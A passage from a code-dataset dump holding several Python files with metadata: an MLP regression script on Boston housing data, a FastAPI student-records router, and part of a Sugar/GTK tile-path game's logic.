{"api_name": "ezdxf.entities.Arc", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 225, "usage_type": "name"}, {"api_name": "ezdxf.math.Vector", "line_number": 225, "usage_type": "name"}, {"api_name": "ezdxf.math.Vector", "line_number": 235, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 238, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 240, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 241, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 243, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 244, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 246, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 247, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 249, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 252, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 254, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 255, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 257, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 258, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 260, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 261, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 263, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 266, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 268, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 269, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 271, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 272, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 274, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 275, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 277, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 280, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 282, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 283, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 285, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 286, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 288, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 289, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 233, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 233, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 294, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 297, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 299, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 300, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 302, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 303, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 305, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 306, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 308, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 311, "usage_type": "call"}, 
{"api_name": "math.pi", "line_number": 313, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 314, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 316, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 317, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 319, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 320, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 322, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 325, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 327, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 328, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 330, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 331, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 333, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 334, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 336, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 339, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 341, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 342, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 344, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 345, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 347, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 348, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 292, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 292, "usage_type": "attribute"}, {"api_name": "pytest.main", "line_number": 352, "usage_type": "call"}]} +{"seq_id": "12878303693", "text": "import numpy as np\nimport pandas as pd\nimport multiLayerPerceptron.MLP_layer as layer\nfrom multiLayerPerceptron.MLP_network import MultiLayerPerceptron\nfrom sklearn.datasets import load_boston\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom sklearn.model_selection import KFold \nfrom sklearn.preprocessing import MinMaxScaler \nimport math \nfrom metrics import *\n\nX = load_boston().data\ny= load_boston().target\nscalar = MinMaxScaler()\nscalar.fit(X)\nX = scalar.transform(X)\nX = X.reshape(X.shape[0], 1, 13)\nX = X.astype('float32')\n\n# Defining the Network\nnet = MultiLayerPerceptron()\nnet.add(layer.FullyConnectedLayer(13, 40)) \nnet.add(layer.ActivationLayer(layer.sigmoid, layer.sigmoid_prime))\nnet.add(layer.FullyConnectedLayer(40, 13)) \nnet.add(layer.ActivationLayer(layer.sigmoid, layer.sigmoid_prime))\nnet.add(layer.FullyConnectedLayer(13, 1)) \n\nkf = KFold(n_splits=3)\n\ni = 1\nov_rmse = 0\nnet.use(layer.mse, layer.mse_prime)\nfor train_index, test_index in kf.split(X):\n X_train = X[train_index]\n y_train = y[train_index]\n X_test = X[test_index]\n y_test = y[test_index]\n\n net.fit(X_train, y_train, epochs=100, learning_rate=3e-3)\n y_hat = net.predict(X_test)\n rmse_curr = rmse(pd.Series(y_hat),pd.Series(y_test))\n print(f\"RMSE error for Fold {i}:\", rmse_curr)\n ov_rmse += rmse_curr\n i+=1\n\nprint(\"Overall RMSE:\", ov_rmse/3)\n\n\n", "repo_name": "AdityaPusalkar/assignment-3-AdityaPusalkar", "sub_path": "q6b.py", "file_name": "q6b.py", "file_ext": "py", "file_size_in_byte": 1413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 
"github-code", "pt": "53", "api": [{"api_name": "sklearn.datasets.load_boston", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_boston", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 15, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_network.MultiLayerPerceptron", "line_number": 22, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 23, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 23, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.ActivationLayer", "line_number": 24, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 24, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid", "line_number": 24, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid_prime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 25, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 25, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.ActivationLayer", "line_number": 26, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 26, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid", "line_number": 26, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid_prime", "line_number": 26, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 27, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 27, "usage_type": "name"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 29, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer.mse", "line_number": 33, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 33, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.mse_prime", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "18020203725", "text": "from typing import List\nfrom fastapi import APIRouter, HTTPException\nfrom app.models.Alumno import Alumno\nimport logging\n\nlogger = logging.getLogger(__name__)\nrouter = APIRouter(prefix=\"/alumnos\",\n tags=[\"alumnos\"], )\n\n\n@router.get(\"/\", response_model=List[Alumno])\ndef alumnos_get_all():\n # alumnos = Alumno.get_all()\n alumnos = []\n logger.info('alumnos %s', alumnos)\n\n return alumnos\n\n\n@router.get('/{alumno_id}', response_model=Alumno)\ndef get_detail(alumno_id: int):\n alumno = Alumno.get_by_id(alumno_id)\n if alumno is None:\n raise HTTPException(status_code=404, detail=f\"Alumno con id:{alumno_id} not found\")\n\n return alumno\n\n\n@router.put('/{persona_id}', response_model=Alumno)\ndef update_detail(alumno_id: int, alumno: Alumno):\n alumno_original = Alumno.get_by_id(alumno_id)\n print(alumno)\n return alumno\n", "repo_name": "cids-arquitectura/fastapi_microservice", "sub_path": "app/routes/alumnos.py", "file_name": "alumnos.py", "file_ext": "py", "file_size_in_byte": 867, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "fastapi.APIRouter", 
"line_number": 7, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 11, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno.get_by_id", "line_number": 22, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 24, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 20, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 30, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno.get_by_id", "line_number": 31, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 31, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "44034596500", "text": "from gettext import gettext as _\n\nimport logging\n_logger = logging.getLogger('paths-activity')\n\nfrom sugar3.graphics import style\nGRID_CELL_SIZE = style.GRID_CELL_SIZE\n\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\n\nfrom grid import Grid\nfrom hand import Hand\nfrom deck import Deck\nfrom tile import error_graphic, highlight_graphic, blank_tile\nfrom utils import json_dump\nfrom constants import ROW, COL, NORTH, EAST, SOUTH, WEST, TILE_WIDTH, \\\n TILE_HEIGHT, HIDE, BOARD, GRID, TILES, TOP, OVER_THE_TOP\nfrom sprites import Sprites\n\nOFFSETS = [-COL, 1, COL, -1]\nMY_HAND = 0\nROBOT_HAND = 1\n\n\nclass Game():\n\n def __init__(self, canvas, parent=None, colors=['#A0FFA0', '#FF8080']):\n self._activity = parent\n self.colors = colors\n\n # Starting from command line\n if parent is None:\n self._running_sugar = False\n self._canvas = canvas\n else:\n self._running_sugar = True\n self._canvas = canvas\n parent.show_all()\n\n self._canvas.set_can_focus(True)\n self._canvas.add_events(Gdk.EventMask.BUTTON_PRESS_MASK |\n Gdk.EventMask.BUTTON_RELEASE_MASK |\n Gdk.EventMask.POINTER_MOTION_MASK)\n self._canvas.connect(\"draw\", self._draw_cb)\n self._canvas.connect(\"button-press-event\", self._button_press_cb)\n self._canvas.connect(\"button-release-event\", self._button_release_cb)\n self._canvas.connect(\"motion-notify-event\", self._mouse_move_cb)\n self._canvas.connect(\"key_press_event\", self._keypress_cb)\n\n self._width = Gdk.Screen.width()\n self._height = Gdk.Screen.height() - (GRID_CELL_SIZE * 1.5)\n self._scale = self._height / (8.0 * TILE_HEIGHT)\n self.tile_width = TILE_WIDTH * self._scale\n self.tile_height = TILE_HEIGHT * self._scale\n\n # Generate the sprites we'll need...\n self._sprites = Sprites(self._canvas)\n self.grid = Grid(self._sprites, self._width, self._height,\n self.tile_width, self.tile_height, self._scale,\n colors[0])\n self.deck = Deck(self._sprites, self._scale, colors[1])\n self.deck.board.move((self.grid.left, self.grid.top))\n self.hands = []\n self.hands.append(Hand(self.tile_width, self.tile_height))\n self._errormsg = []\n for i in range(4):\n self._errormsg.append(error_graphic(self._sprites))\n self._highlight = highlight_graphic(self._sprites, self._scale)\n self._score_card = blank_tile(self._sprites, scale=self._scale * 2,\n color=colors[1])\n self._score_card.set_label_attributes(64)\n self._score_card.move(((int(self._width / 2) - self.tile_width),\n int(self._height / 2) - self.tile_height))\n\n # and initialize a few variables we'll need.\n self.buddies = []\n self._my_hand = MY_HAND\n 
self.playing_with_robot = False\n self._all_clear()\n\n def _all_clear(self):\n ''' Things to reinitialize when starting up a new game. '''\n self._hide_highlight()\n self._hide_errormsgs()\n self.deck.hide()\n self.deck.clear()\n self.grid.clear()\n for hand in self.hands:\n hand.clear()\n self.show_connected_tiles()\n\n self._press = None\n self._release = None\n self._dragpos = [0, 0]\n self._total_drag = [0, 0]\n self.last_spr_moved = None\n self._last_tile_played = None\n self._last_tile_orientation = 0\n self._last_grid_played = None\n\n self.whos_turn = MY_HAND\n self._waiting_for_my_turn = False\n self._waiting_for_robot = False\n self.placed_a_tile = False\n self._there_are_errors = False\n\n self.score = 0\n self._score_card.set_layer(HIDE)\n self._score_card.move(((int(self._width / 2) - self.tile_width),\n int(self._height / 2) - self.tile_height))\n self.saw_game_over = False\n\n def _initiating(self):\n if not self._running_sugar:\n return True\n return self._activity.initiating\n\n def new_game(self, saved_state=None, deck_index=0):\n ''' Start a new game. '''\n self._all_clear()\n\n # If we are not sharing or we are the sharer...\n if not self.we_are_sharing() or self._initiating():\n # Let joiners know we are starting a new game...\n if self.we_are_sharing():\n self._activity.send_event(\"n\", \" \")\n\n # The initiator shuffles the deck...\n self.deck.shuffle()\n # ...and shares it.\n if self.we_are_sharing():\n self._activity.send_event(\"d\", self.deck.serialize())\n\n # Deal a hand to yourself...\n self.hands[self._my_hand].deal(self.deck)\n\n # ...deal a hand to the robot...\n if self.playing_with_robot:\n if len(self.hands) < ROBOT_HAND + 1:\n self.hands.append(Hand(self.tile_width, self.tile_height,\n remote=True))\n self.hands[ROBOT_HAND].deal(self.deck)\n # ...or deal hands to the joiners.\n elif len(self.buddies) > 1:\n for i, buddy in enumerate(self.buddies):\n if buddy != self._activity.nick:\n self.hands.append(Hand(\n self.tile_width, self.tile_height, remote=True))\n self.hands[i].deal(self.deck)\n self._activity.send_event(\"h\",\n self.hands[i].serialize(buddy=buddy))\n\n # As initiator, you take the first turn.\n self.its_my_turn()\n\n # If we are joining, we need to wait for a hand.\n else:\n self._my_hand = self.buddies.index(self._activity.nick)\n self.its_their_turn(self.buddies[1]) # Sharer will be buddy 1\n\n def we_are_sharing(self):\n ''' If we are sharing, there is more than one buddy. '''\n if len(self.buddies) > 1:\n return True\n\n def _set_label(self, string):\n ''' Set the label in the toolbar or the window frame. 
'''\n if self._running_sugar:\n self._activity.status.set_label(string)\n self._activity.score.set_label(_('Score: ') + str(self.score))\n elif hasattr(self, 'win'):\n self.win.set_title('%s: %s [%d]' % (_('Paths'), string,\n self.score))\n\n def its_my_turn(self):\n # I need to play a piece...\n self.placed_a_tile = False\n # and I am no longer waiting for my turn.\n self._waiting_for_my_turn = False\n # If I don't have any tiles left, time to redeal.\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n self._redeal()\n if self._running_sugar:\n self._activity.set_player_on_toolbar(self._activity.nick)\n self._activity.dialog_button.set_icon_name('go-next')\n self._activity.dialog_button.set_tooltip(\n _('Click after taking your turn.'))\n self._set_label(_('It is your turn.'))\n\n def _redeal(self):\n # Only the sharer deals tiles.\n if not self.we_are_sharing():\n self.hands[self._my_hand].deal(self.deck)\n if self.playing_with_robot:\n self.hands[ROBOT_HAND].deal(self.deck)\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n if self._running_sugar:\n self._activity.dialog_button.set_icon_name(\n 'media-playback-stop-insensitive')\n self._activity.dialog_button.set_tooltip(_('Game over'))\n self.game_over()\n elif self._initiating():\n if self.deck.empty():\n self.game_over()\n return\n if self.deck.tiles_remaining() < COL * len(self.buddies):\n number_of_tiles_to_deal = \\\n int(self.deck.tiles_remaining() / len(self.buddies))\n if number_of_tiles_to_deal == 0:\n number_of_tiles_to_deal = 1 # Deal last tile in deck.\n else:\n number_of_tiles_to_deal = COL\n for i, nick in enumerate(self.buddies):\n self.hands[i].deal(self.deck, number_of_tiles_to_deal)\n # Send the joiners their new hands.\n if nick != self._activity.nick:\n self._activity.send_event(\"h\",\n (self.hands[i].serialize(buddy=nick)))\n\n def took_my_turn(self):\n # Did I complete my turn without any errors?\n if self._there_are_errors:\n self._set_label(_('There are errors—it is still your turn.'))\n return\n\n # After the tile is placed, expand regions of playable grid squares.\n self.show_connected_tiles()\n\n # Are there any completed paths?\n self._test_for_complete_paths(self._last_grid_played)\n\n # If so, let everyone know what piece I moved.\n if self.we_are_sharing():\n self._activity.send_event(\"p\", json_dump([self._last_tile_played,\n self._last_tile_orientation,\n self._last_grid_played]))\n\n self._last_tile_orientation = 0 # Reset orientation.\n # I took my turn, so I am waiting again.\n self._waiting_for_my_turn = True\n if self.last_spr_moved is not None:\n self.last_spr_moved.set_layer(TILES)\n self.last_spr_moved = None\n self._hide_highlight()\n self._set_label(_('You took your turn.'))\n\n if self.playing_with_robot:\n self.its_their_turn(_('robot'))\n self._waiting_for_robot = True\n gobject.timeout_add(1000, self._robot_turn)\n elif not self.we_are_sharing():\n if self.deck.empty() and \\\n self.hands[self._my_hand].tiles_in_hand() == 0:\n self.game_over()\n else:\n self.its_my_turn()\n elif self._initiating():\n self.whos_turn += 1\n if self.whos_turn == len(self.buddies):\n self.whos_turn = 0\n else:\n self.its_their_turn(self.buddies[self.whos_turn])\n self._activity.send_event(\"t\", self.buddies[self.whos_turn])\n\n def _robot_turn(self):\n self._robot_play()\n self.show_connected_tiles()\n if not self._waiting_for_robot:\n self.its_my_turn()\n\n def its_their_turn(self, nick):\n # It is someone else's turn.\n if self._running_sugar:\n if not self.playing_with_robot:\n 
self._activity.set_player_on_toolbar(nick)\n self._activity.dialog_button.set_icon_name('media-playback-stop')\n self._activity.dialog_button.set_tooltip(_('Wait your turn.'))\n self._set_label(_('Waiting for') + ' ' + nick)\n self._waiting_for_my_turn = True # I am still waiting.\n\n def _button_press_cb(self, win, event):\n win.grab_focus()\n x, y = map(int, event.get_coords())\n\n self._dragpos = [x, y]\n self._total_drag = [0, 0]\n\n spr = self._sprites.find_sprite((x, y))\n\n # If it is not my turn, do nothing.\n if self._waiting_for_my_turn:\n self._press = None\n return\n\n self._release = None\n\n # Ignore clicks on background except to indicate you took your turn\n if spr is None or spr in self.grid.blanks or spr == self.deck.board:\n if self.placed_a_tile and spr is None:\n self.took_my_turn()\n self._press = None\n return True\n\n # Are we clicking on a tile in the hand?\n if self.hands[self._my_hand].spr_to_hand(spr) is not None and \\\n not self._there_are_errors:\n self.last_spr_moved = spr\n clicked_in_hand = True\n if self.placed_a_tile:\n self._press = None\n self.took_my_turn()\n else:\n clicked_in_hand = False\n\n # We cannot switch to an old tile.\n if spr == self.last_spr_moved:\n self._press = spr\n\n spr.set_layer(TOP)\n self._show_highlight()\n return True\n\n def _mouse_move_cb(self, win, event):\n \"\"\" Drag a tile with the mouse. \"\"\"\n spr = self._press\n if spr is None:\n self._dragpos = [0, 0]\n return True\n win.grab_focus()\n x, y = map(int, event.get_coords())\n dx = x - self._dragpos[0]\n dy = y - self._dragpos[1]\n spr.move_relative([dx, dy])\n self._move_relative_highlight([dx, dy])\n self._dragpos = [x, y]\n self._total_drag[0] += dx\n self._total_drag[1] += dy\n\n def _button_release_cb(self, win, event):\n win.grab_focus()\n\n self._dragpos = [0, 0]\n\n if self._waiting_for_my_turn:\n return\n\n if self._press is None:\n return\n\n x, y = map(int, event.get_coords())\n spr = self._sprites.find_sprite((x, y))\n self._release = spr\n grid_pos = self.grid.xy_to_grid(x, y)\n hand_pos = self.hands[self._my_hand].xy_to_hand(x, y)\n\n # Placing tile in grid\n if grid_pos is not None and self._it_is_a_drag() and \\\n self.grid.blanks[grid_pos].get_layer() > HIDE:\n\n # Moving to an empty grid position\n if self.grid.grid[grid_pos] is None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n # If the tile was previously in the grid, empty its old pos.\n i = self.grid.spr_to_grid(self._press)\n if i is not None:\n self.grid.grid[i] = None\n\n # Assign the tile to the new grid position.\n self.grid.grid[grid_pos] = tile\n self.placed_a_tile = True\n self._last_tile_played = tile.number\n self._last_grid_played = grid_pos\n\n # If the tile came from the hand, empty its old position.\n i = self.hands[self._my_hand].spr_to_hand(self._press)\n if i is not None:\n self.hands[self._my_hand].hand[i] = None\n\n # Remember which tile moved.\n if self.last_spr_moved != tile.spr:\n self.last_spr_moved = tile.spr\n\n self._show_highlight()\n # Returning tile to hand\n elif hand_pos is not None:\n # Make sure there is somewhere to place the tile.\n empty = self.hands[self._my_hand].find_empty_slot()\n if empty is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.hands[self._my_hand].hand_to_xy(empty))\n # Did the tile come from elsewhere in the hand?\n if self.hands[self._my_hand].spr_to_hand(\n self._press) is not None:\n self.hands[self._my_hand].hand[self.hands[\n 
self._my_hand].spr_to_hand(self._press)] = None\n # or from the grid?\n elif self.grid.spr_to_grid(self._press) is not None:\n self.grid.grid[self.grid.spr_to_grid(self._press)] = None\n self.hands[self._my_hand].hand[empty] = tile\n\n # Remember which tile moved.\n if spr == self.last_spr_moved:\n self.last_spr_moved = None\n\n self._hide_errormsgs()\n self._there_are_errors = False\n else: # Or return tile to the grid\n grid_pos = self.grid.spr_to_grid(self._press)\n if grid_pos is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n\n self._hide_highlight()\n self._press = None\n self._release = None\n self.placed_a_tile = False\n return True\n # Rotate\n elif self._press == self._release and not self._it_is_a_drag():\n tile = self.deck.spr_to_tile(spr)\n tile.rotate_clockwise()\n self._last_tile_orientation = tile.orientation\n\n # Remember which tile moved.\n if self.last_spr_moved != tile.spr:\n self.last_spr_moved = tile.spr\n self._show_highlight()\n\n # In limbo: return to grid\n if hand_pos is None and x < self.grid.left:\n grid_pos = self.grid.spr_to_grid(self._press)\n if grid_pos is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n self._hide_highlight()\n\n self._snap_to_grid(self._release)\n self._test_for_bad_paths(self.grid.spr_to_grid(self._press))\n self._press = None\n self._release = None\n return True\n\n def _snap_to_grid(self, spr):\n ''' make sure a tile is aligned in its grid position '''\n for i in range(COL * ROW):\n if self.grid.grid[i] is not None:\n self.grid.grid[i].spr.move(self.grid.grid_to_xy(i))\n if self.grid.grid[i].spr == spr:\n self._move_highlight(self.grid.grid_to_xy(i))\n\n def _it_is_a_drag(self):\n ''' The movement was large enough to be consider a drag as opposed\n to a tile rotate. '''\n if self._total_drag[0] * self._total_drag[0] + \\\n self._total_drag[1] * self._total_drag[1] > \\\n self.tile_width * self.tile_height:\n return True\n return False\n\n def _shuffle_up(self, hand):\n ''' Shuffle all the tiles in a hand to the top. '''\n for i, tile in enumerate(self.hands[hand].hand):\n empty = self.hands[hand].find_empty_slot()\n if i > 0 and tile is not None and empty is not None:\n tile.spr.move(self.hands[hand].hand_to_xy(empty))\n self.hands[hand].hand[empty] = tile\n self.hands[hand].hand[i] = None\n\n def game_over(self, msg=_('Game over')):\n ''' Nothing left to do except show the results. 
'''\n self._set_label(msg)\n self.saw_game_over = True\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n self.score += 50 # Bonus points\n else:\n for tile in self.hands[self._my_hand].hand:\n if tile is not None:\n self.score -= 2 * tile.get_value() # Penalty\n self._shuffle_up(self._my_hand)\n if self._running_sugar:\n self._activity.score.set_label(_('Score: ') + str(self.score))\n self._score_card.set_label(str(self.score))\n self._score_card.set_layer(OVER_THE_TOP)\n self._score_card.move((int(self.tile_width / 2),\n int(self._height / 2) + 2 * self.tile_height))\n if self.playing_with_robot:\n self._shuffle_up(ROBOT_HAND)\n for tile in range(COL):\n if self.hands[ROBOT_HAND].hand[tile] is not None:\n x, y = self.hands[ROBOT_HAND].hand_to_xy(tile)\n self.hands[ROBOT_HAND].hand[tile].spr.move(\n (self.grid.left_hand + self.grid.xinc, y))\n if self._running_sugar:\n self._activity.set_robot_status(False, 'robot-off')\n elif self.we_are_sharing():\n self._activity.send_event(\"g\", \" \")\n\n def show_connected_tiles(self):\n ''' Highlight the squares that surround the tiles already on the grid.\n '''\n for i in range(ROW * COL):\n if self._connected(i):\n self.grid.blanks[i].set_layer(GRID)\n else:\n self.grid.blanks[i].set_layer(HIDE)\n\n def _connected(self, tile):\n ''' Does tile abut the path? '''\n if self.grid.grid.count(None) == ROW * COL:\n return True\n if self.grid.grid[tile] is not None: # already has a tile\n return False\n # Looking north\n if tile >= COL and self.grid.grid[tile + OFFSETS[0]] is not None:\n return True\n # Looking east\n if tile % ROW < ROW - 1 and \\\n self.grid.grid[tile + OFFSETS[1]] is not None:\n return True\n # Looking south\n if tile < (ROW - 1) * COL and \\\n self.grid.grid[tile + OFFSETS[2]] is not None:\n return True\n # Looking west\n if tile % ROW > 0 and self.grid.grid[tile + OFFSETS[3]] is not None:\n return True\n return False\n\n def give_a_hint(self):\n ''' Try to find an open place on the grid for any tile in my_hand. '''\n order = self.deck.random_order(ROW * COL)\n for i in range(ROW * COL):\n if self._connected(order[i]):\n for tile in self.hands[self._my_hand].hand:\n if self._try_placement(tile, order[i]):\n # Success, so give hint.\n self.grid.grid[order[i]] = None\n self._show_highlight(\n pos=self.grid.grid_to_xy(order[i]))\n return\n # Nowhere to play.\n self.game_over(_('Nowhere to play.'))\n\n def _robot_play(self):\n ''' The robot tries random tiles in random locations. '''\n # TODO: strategy try to complete paths\n order = self.deck.random_order(ROW * COL)\n for i in range(ROW * COL):\n if self._connected(order[i]):\n for tile in self.hands[ROBOT_HAND].hand:\n if self._try_placement(tile, order[i]):\n # Success, so remove tile from hand.\n self.hands[ROBOT_HAND].hand[\n self.hands[ROBOT_HAND].hand.index(tile)] = None\n tile.spr.move(self.grid.grid_to_xy(order[i]))\n tile.spr.set_layer(TILES)\n self._waiting_for_robot = False\n return\n\n # If we didn't return above, we were unable to play a tile.\n self.game_over(_('Robot unable to play'))\n\n def _try_placement(self, tile, i):\n ''' Try to place a tile at grid posiion i. Rotate it, if necessary. '''\n if tile is None:\n return False\n self.grid.grid[i] = tile\n for j in range(4):\n self._test_for_bad_paths(i)\n if not self._there_are_errors:\n return True\n tile.rotate_clockwise()\n self.grid.grid[i] = None\n return False\n\n def _test_for_complete_paths(self, tile):\n ''' Did this tile complete a path? (or two paths?) 
'''\n\n # A tile can complete up to two paths.\n self._paths = [[], []]\n break_in_path = [False, False]\n\n # Seed the paths and lists with the current tile.\n if tile is not None:\n self._add_to_path_list(tile, 0, 0)\n if len(self.grid.grid[tile].paths) == 2:\n self._add_to_path_list(tile, 1, 1)\n\n # Walk the path.\n for p in range(2):\n tile, path = self._tile_to_test(p)\n while(tile is not None):\n self._test(tile, path, p, self._test_a_neighbor)\n self._tile_has_been_tested(tile, path, p)\n tile, path = self._tile_to_test(p)\n # Is the path complete?\n for i in self._paths[p]:\n if not self._test(i[0], i[1], None, self._test_a_connection):\n break_in_path[p] = True\n if not break_in_path[p] and len(self._paths[p]) > 0:\n for i in self._paths[p]:\n self.grid.grid[i[0]].set_shape(i[1])\n self.score += self.grid.grid[i[0]].get_value()\n\n def _tile_to_test(self, test_path):\n ''' Find a tile that needs testing. '''\n for i in self._paths[test_path]:\n if i[2] is False:\n return i[0], i[1]\n return None, None\n\n def _add_to_path_list(self, tile, tile_path, test_path):\n ''' Only add a tile to the path if it is not already there. '''\n for i in self._paths[test_path]:\n if i[0] == tile and i[1] == tile_path:\n return\n self._paths[test_path].append([tile, tile_path, False])\n\n def _tile_has_been_tested(self, tile, tile_path, test_path):\n ''' Mark a tile as tested. '''\n for i in self._paths[test_path]:\n if i[0] == tile and i[1] == tile_path:\n i[2] = True\n return\n\n def _test(self, tile, tile_path, test_path, test):\n ''' Test each neighbor of a block for a connecting path. '''\n if tile is None:\n return False\n for i in range(4):\n if not test(tile, tile_path, test_path, i, tile + OFFSETS[i]):\n return False\n return True\n\n def _test_a_connection(self, tile, tile_path, test_path, direction,\n 